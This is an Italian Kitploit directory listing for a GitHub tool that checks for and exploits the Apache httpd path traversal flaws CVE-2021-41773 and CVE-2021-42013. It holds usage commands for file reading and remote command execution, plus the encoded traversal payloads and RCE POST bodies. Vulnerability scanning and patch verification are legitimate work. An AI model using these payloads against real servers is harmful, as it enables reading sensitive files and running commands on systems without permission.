Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
apache-httpd-path-traversal-checker — Controllore di path traversal per apache httpd (CVE-2021-41773 / CVE-2021-42013) | Kitploit
Strumenti/GitHubGitHub/thelsa/apache-httpd-path-traversal-checker
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubthelsa/apache-httpd-path-traversal-checker

apache-httpd-path-traversal-checker

Controllore di path traversal per apache httpd (CVE-2021-41773 / CVE-2021-42013)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
954 anni faNon ancora revisionato

apache httpd path traversal checker

0x00 概述

Il 05/10/2021 è stata divulgata online la vulnerabilità di directory traversal di Apache httpd 2.4.49 (cve-2021-41773), che può causare lettura arbitraria di file (se la directory attraversata è consentita, ad esempio configurata con <Directory />Require all granted</Directory>, non consentita di default) o esecuzione di comandi (la RCE richiede l'abilitazione di CGI; il modulo CGI non è incluso di default).

Il 08/10/2021 è uscita la directory traversal di 2.4.50 (cve-2021-42013), che aggira il fix di cve-2021-41773.

Riferimento per i dettagli della vulnerabilità: Riproduzione e analisi della vulnerabilità di directory traversal di Apache httpd 2.4.49/2.4.50

0x01 Avvio rapido

Esegui con python3

Uso: python3 apache-httpd-path-traversal.py -h

Rilevamento di un singolo URL: python3 apache-httpd-path-traversal.py -u "http://1.2.3.4:80"

Rilevamento batch: python3 apache-httpd-path-traversal.py -f urls.txt -t 30 -s 3

Lettura file: python3 apache-httpd-path-traversal.py -u "http://1.2.3.4:80" --cdir /icons --readfile

Esecuzione comandi: python3 apache-httpd-path-traversal.py -u "http://1.2.3.4:80" --cdir /cgi-bin --rce

0x02 Introduzione allo strumento

Invia pacchetti HTTP utilizzando urllib.request.

La verifica della vulnerabilità si basa sulla lettura di /etc/passwd per determinare se i dati restituiti contengono la stringa "root:" (poiché la maggior parte dei sistemi è Linux, per ora il rilevamento su Windows viene ignorato).

Multithread, con timeout selezionabile per aumentare l'efficienza.

Directory esistenti selezionabili (--cdir) e shell per la RCE (--rceshell), per garantire flessibilità.

Durante il rilevamento viene utilizzato un elenco di possibili directory comuni per aumentare il tasso di successo. commonDirList = ['/cgi-bin', '/icons', '/assets', '/uploads', '/img', '/image']

Nota: a volte la lettura dei file sfrutta la directory icons, mentre la RCE richiede la directory cgi-bin; valutare caso per caso.

Vengono utilizzati 7 formati di PoC e 2 formati di dati POST per la RCE:

#cve-2021-41773 poc0 = "/.%2e/%2e%2e/%2e%2e/%2e%2e"

poc1 = "/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e"

#cve-2021-42013 poc2 = "/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65"

poc3 = "/.%%32%65/.%%32%65/.%%32%65/.%%32%65"

poc4 = "/.%%32e/.%%32e/.%%32e/.%%32e"

poc5 = "/.%2%65/.%2%65/.%2%65/.%2%65"

#rce data rce0 = "echo;id"

rce1 = "echo Content-Type: text/plain; echo; id"

// Sembra che anche cambiare il metodo POST della RCE in GET funzioni. // Il payload deve uscire in base alla profondità dei percorsi di Apache; di solito 4 livelli bastano. // È necessaria una directory esistente di Apache, ad esempio icons/ o cgi-bin/.

0x03 TODO

  1. Potrebbe essere aggiunto il rilevamento per sistemi Windows.

  2. Potrebbero essere aggiunte ulteriori tecniche di sfruttamento come la reverse shell.

0x04 Feedback

issus

gmail: [email protected]

qq: [email protected]

Scarica lo strumento